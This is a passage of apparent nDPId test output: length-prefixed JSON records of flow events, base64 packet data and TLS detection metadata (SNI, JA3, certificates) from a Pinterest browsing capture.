+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gCU2wACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnnABu1oBJQ4\/rrWNgBAQLrKDAAABAQgKyRWFssK4oqI="} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14992,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu++u\/fU4yL1fBrgBALkLtnAAABAQgKwrla3eXPQIw="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14993,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbuecD+utY1aASUPgBAZXAuxAAABAQgKwrla48kTaxY="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732959,"flow_last_seen":1605289732959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732959,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605289732959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732959,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7gAAAAAoAL9IOnRAAACBAWgBAIICtZiaYQAAAAAAQMDBw=="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732972,"flow_last_seen":1605289732972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732972,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="} +00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,link.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 